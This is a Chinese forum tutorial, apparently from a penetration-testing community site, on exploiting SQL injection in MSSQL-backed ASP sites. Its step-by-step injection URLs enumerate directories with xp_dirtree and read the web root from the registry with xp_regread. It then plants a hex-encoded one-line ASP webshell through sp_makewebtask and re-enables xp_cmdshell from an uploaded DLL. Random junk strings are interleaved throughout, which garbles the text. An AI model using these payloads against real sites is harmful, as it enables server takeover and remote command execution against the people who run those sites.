中国网络渗透测试联盟

标题: MSsqlL注入取得网站路径最好的方法 [打印本页]

作者: admin    时间: 2012-9-13 17:20
标题: MSsqlL注入取得网站路径最好的方法
好,我们exec master..xp_dirtree'd:/test'
" p( g4 \  Y. Z* C假设我们在test里有两个文件夹test1和test2在test1里又有test3+ c: J3 d) Z" v2 O- P& v: P% D5 V7 m- t
结果显示9 [$ P5 H6 \6 C: i- b
0 _+ Q( l; w5 P' J3 @7 V" N
subdirectory depth; y" E6 X0 |/ ?2 z$ q
test1 1
" k' V: }: E2 U: P# B) ?: Rtest3 2
2 d+ ~# z/ T7 F0 E' B( E5 l/ _8 h" Mtest2 1; q- Q$ H- o5 z. Y

" |, ^/ m3 f; z* X( d3 z! H哈哈发现没有那个depth就是目录的级数2 e+ x/ U' f4 d
ok了,知道怎么办了吧
" y! H- D( e" G: C- J' J. V  A3 y! u- w. Q
http://www.xxxxx.com/down/list.asp?id=1;create table dirs(paths varchar(1000),id int)-- : u7 j$ o# [; s7 G; r. |
http://www.xxxxx.com/down/list.asp?id=1;insert dirs exec master.dbo.xp_dirtree 'd:\' --
; R5 ]8 h7 {0 t5 ^) E0 b+ p/ @http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs where id=1)-
3 p( Z* r+ Z- j
) K% I/ b6 d3 O% w" R  I只要加上id=1,就是第一级目录 。
2 n$ f# I. R" ]; C2 C7 @$ [/ ]
% H% s0 e% ^5 p5 s* s6 q3 Y: R7 z+ a1 T, Z
通过注册表读网站路径:
' }0 j5 H9 C$ H+ ]- M  F
1 H) `' w, J+ M; l* ]1.;create table [dbo].[cyfd] ([gyfd][char](255));
# I$ F) Y# x6 C; \6 S) n4 X" U' G0 b+ l6 U
2.DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE', 'SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result output insert into 临时表 (临时字段名) values(@result);--+ {  a, i- h2 U: x3 Q: K
id=2;DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result output insert into cyfd (gyfd) values(@result);--
' y. E/ L) N# g/ N9 e
: E1 s  c+ e2 f9 i3.and 1=(select count(*) from 临时表 where 临时字段名>1)
3 u7 t$ Q( j! R' iand 1=(select count(*) from cyfd where gyfd > 1)
# X1 J5 S" J0 I# n' W这样IE报错,就把刚才插进去的Web路径的值报出来了8 ?! ~4 b. i! p$ P2 }- v
0 U$ ~  J5 o  ?1 E  x
4.drop table cyfd;-- 删除临时表* p# ^0 K8 h! X# m4 Z3 C6 V

0 A, o7 I/ _6 c% I& C3 l+ L: j获得webshell方法:
9 K! S/ k- |1 I/ C. @1 V9 x& O1.create table cmd (a image)-- \**cmd是创建的临时表
: l& g1 c" V" n" e2 H8 q: G% q1 F' s. J8 q. ]3 }
2.insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)-- 往cmd表里插入一句话% y  y$ n6 i# m/ D3 `: l

4 L. C! ^' H+ @4 y3 y: }7 Z
; E6 q! J$ d) Q5 ]3.EXECUTE sp_makewebtask @outputfile = 'WEB绝对路径\导出的文件名.asp',@query = 'SELECT image FROM cmd'
& k# S& s5 d/ q% l& P# @EXECUTE sp_makewebtask @outputfile = 'WEB绝对路径\导出的文件名.asp',@query = 'SELECT 你的字段 FROM 你建的临时表'" v  R+ ?: ~2 m1 B8 r4 Z6 }- L

% M' i; a* `7 B) O4.drop table cmd;-- 删除cmd临时表( [4 G! R8 _, v; T

4 u" Q* g: Z. g' e& L- ]恢复xp_cmdshell方法之一:
, ~$ e9 [- A5 L! j+ B" l我很快就把xplog70.dll文件给他上传到e:\inetpub\wwwroot目录下了,来吧,我们来给他恢复,提交:1 A. p) q7 b1 v7 Q* C* C
http://www.something.com/script.asp?id=2;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','e:\inetpub\wwwroot\xplog70.dll'% t5 L, b2 d5 ~% y/ M* T4 S# D
恢复,支持绝对路径的恢复哦。:)0 |  O. c2 o% z" j. V





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2